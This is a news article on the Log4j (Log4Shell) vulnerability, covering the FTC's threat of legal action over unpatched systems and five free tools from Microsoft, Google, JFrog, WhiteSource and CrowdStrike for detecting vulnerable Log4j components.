2022 kicked off with the FTC threatening legal action against companies failing to patch the CVE-2021-44228 vulnerability affecting Log4j. Microsoft also warned about how the Log4j vulnerabilities represent “a complex and high-risk situation for companies across the globe.†Here’s a look at some of the top free tools you can use to patch the vulnerability and secure your software and services from malicious exploitation.
First discovered on December 9, the Apache Log4j or Log4Shell zero-day vulnerability (CVE-2021-44228) involves an exploit affecting Log4j, an open-source Apache library for logging errors and events in Java-based applications. Morphisec’s CTO Michael Gorelik says the exploit “allows threat actors to take over compromised web-facing servers by feeding them a malicious text string.â€
The vulnerability affecting Log4j has raised severe concerns worldwide thanks to the scale at which malicious actors can exploit it to target organizations. Within days after the vulnerability was detected, Cisco Talos reported stopping more than 845,000 breach attempts with identified criminal groups accounting for more than 46% of those efforts. Security researchers at Check Point also identified vulnerabilities in more than 40% of business networks worldwide, 88% of them in Europe and the ANZ region.
Over 40% of Log4j Components Downloaded Since December Are Vulnerable
Even though governments worldwide have alerted organizations about the Log4j vulnerability, organizations continue to act indifferent to the looming threat. Software security firm Sonatype recently found that the Log4j component was downloaded a huge 10,355,032 times since the vulnerability was discovered, with over 40% of those downloads coming from critically vulnerable versions.Â
“The fact that we are still facing such high percentages of vulnerable downloads is indicative of a much bigger problem with supply chain security. If companies don’t understand what’s in their software, they’re unable to act with the requisite speed when threats arise – and in this instance, given the huge popularity of Log4j, this exposes them to significant risk,†says Ilkka Turunen, field CTO, Sonatype.
“Fortunately, there are safe versions of the component available, so for those companies which have acted quickly, their risk has been significantly reduced. However, this needs to serve as an urgent wake-up call that businesses must understand what’s in their software, where dependencies lie, and not leverage vulnerable components when safe ones are available.â€
See More: Exploitation of Log4j Flaws May Continue for Years, Microsoft Warns
FTC Serves An Ultimatum
The use of vulnerable versions of Log4j, despite safe versions being available, exposes organizations to hacking attempts and legal action for failing to address the issue. Earlier in January, the Federal Trade Commission (FTC) threatened legal actionOpens a new window against companies failing to patch the CVE-2021-44228 vulnerability affecting Log4j. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,†it said.
To clarify that it means business, the FTC cited how it forced Equifax to cough up $700 million for failing to patch a known vulnerability in 2019. “A failure to patch a known vulnerability irreversibly exposed the personal information of 147 million consumers. Equifax agreed to pay $700 million to settle actions by the Federal Trade Commission, the Consumer Financial Protection Bureau, and all fifty states,†it said.
The simplest solution for organizations that may have missed the bus is to update their Log4j software to the most current versionOpens a new window and to advise third-party subsidiaries to update their respective software. However, it is easier said than done.Â
According to Microsoft, Log4j vulnerabilities representOpens a new window “a complex and high-risk situation for companies across the globe as the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications. There is, therefore, no quick fix solution and only advanced scanning capabilities and a robust incident response plan can help organizations tide over the crisis in the months, perhaps years to come.
So how can organizations find out if their applications and services are vulnerable to Log4j exploits? Let’s look at the top five solutions that developers can use to keep the threat away from their digital infrastructures:
Top Tools to Detect and Mitigate Log4j Exploitations
Microsoft 365 Defender
Microsoft has offered its entire suite of security tools and solutions to help organizations detect and mitigate Log4j exploits inside their networks. These solutions enable users to detect exploitation attempts, remote code execution, and post-exploitation activity. For instance, Microsoft Defender Antivirus leverages cloud-based machine learning to block new and unknown variants and detect components and behaviors related to the Log4j vulnerability in Windows and Linux systems.
Microsoft Defender for Endpoint ensures that executable files are blocked from running unless they meet a prevalence, age, or trusted list criterion. It also alerts users about signs of post-exploitation, such as coin mining, lateral movement, suspicious remote PowerShell execution, suspicious network traffic connection to C2 Server, hands-on-keyboard attacker activity, and Cobalt Strike.Â
Microsoft Defender for Cloud Apps helps detect exploitation attempts via cloud applications that use vulnerable Log4j components, and organizations can detect Log4j exploitation attempts via email by activating Microsoft Defender for Office 365. Organizations can also choose from a range of Microsoft security solutions, such as Microsoft Sentinel, Microsoft Defender for IoT, Azure Firewall Premium, and Azure Web Application Firewall (WAF) to detect and defeat Log4j exploitation attempts.
Google’s Cloud Logging detection
Internet giant Google has unveiled its cloud logging detection solution, which helps organizations use the Logs Explorer to detect existing attempts to exploit the Log4j 2 vulnerability. To make the solution efficient, organizations must turn on logs across their IT environments, which expands visibility into activities occurring within the environment. Organizations can create queries in the Logs Explorer to scan for some of the possible exploit strings and can use indexed fields like resource.type, resource.labels, or logName to make the queries run faster.
Organizations can also use security policies by Google Cloud Armor or access control by Identity-Aware Proxy (IAP) to enable mitigation techniques. They can also create log-based alerts to notify their security operation center (SOC) or incident response teams when new log entries match the query.Â
On GitHub, Google also open-sourced log4jscannerOpens a new window , a log4j vulnerability filesystem scanner and Go package for analyzing JAR files. The tool primarily walks the directory, printing any detected JARs to stdout and lets organizations scan directories in MacOS and the entire root filesystem on Linux. Organizations can customize the scanning tool through the jar.Walker API, based on their specific requirements.Â
See More: Log4j Flaw: Top 10 Affected Vendors and Best Solutions to Mitigate Exploitations
JFrog OSS tools for Log4j
Following the discovery of vulnerabilities in Log4j, the JFrog Security Research team published a set of dedicated Log4j open-source scanning tools for developers to detect Log4j utilization and risk in both their source code and binaries. The JFrog team chose to create passive scanning tools as active scanning tools involve an element of risk.Â
“Active Log4j scanning tools attempt to trigger the Log4Shell vulnerability by entering inputs through user-accessible interfaces and seeing the results, without analyzing the data path between the user-accessible interfaces and the potentially vulnerable logging API functions. Therefore, if all attempts at triggering the vulnerability fail, one may erroneously reach the conclusion that the application is safe even though the Log4j vulnerability is still exploitable by entering inputs that were not tested,†the firm said.
According to JFrog, rather than specific file names or metadata, its tools use code classes to diagnose the inclusion of vulnerable code. This way, it does not assume anything about the file names or completeness of build info or vulnerable package databases when scanning for vulnerable code. Developers can also use the firm’s tools to understand how they use Log4j in their applications. This way, developers can assess whether unfiltered user-controlled input may reach Log4j API calls and conclude whether the software was indeed vulnerable before the patch.
WhiteSource Log4j Detect
Open-source security and management company WhiteSource has made available WhiteSource Log4j Detect, a free command-line interface (CLI) tool hosted on GitHub. The tool helps organizations quickly detect and remediate the Log4j vulnerabilities CVE-2021-44228 and CVE-2021-445046. WhiteSource says the tool helps developers run quick scans to find vulnerable Log4j versions and seamlessly update them to the latest versions. “As a standalone tool, developers can download the utility that matches their platform, run it within the terminal, and run the scan command on the root folder of the project,†it said.
“Adopting a remediation-first approach and baking security automation into development is the best way to proactively address new and emerging risks to today’s software development organizations.†said Rami Sass, co-founder and CEO of WhiteSource. “By offering this free tool to developers and their teams, we aim to help organizations address these vulnerabilities, and mitigate their impact.â€
CrowdStrike Archive Scan Tool
To address the need of organizations worldwide to locate applications using vulnerable versions of Log4j, cybersecurity company CrowdStrike has released a free community tool called the CrowdStrike Archive Scan Tool (CASTOpens a new window ). The company says that CAST “performs a targeted search by scanning a given set of directories for JAR, WAR, ZIP and EAR files, and then it performs a deeper scan on those file types matching against a known set of checksums for Log4j libraries.†This method helps the tool to find any version of the affected Log4j library, even if it is deeply nested in multiple levels of archive files.
CAST can run on Windows, Mac and Linux systems. Developers can quickly deploy it by downloading the binary to disk and executing it with the directories or files they want to scan. The tool is designed to be single-threaded to limit the impact of scans on system performance, but developers can scan multiple directories simultaneously by executing multiple copies of CAST.Â
Crowdstrike says that scans conducted by CAST can bring up several false positives. However, this was intentional as it wants developers and incident response teams to decide whether a specific result warrants further investigation. “We may see higher false positives because we identify any trace of vulnerable versions of Log4j, even if the vulnerability has been addressed by removing one or more classes from the deployment,†the company said.
MORE ON LOG4J VULNERABILITIES: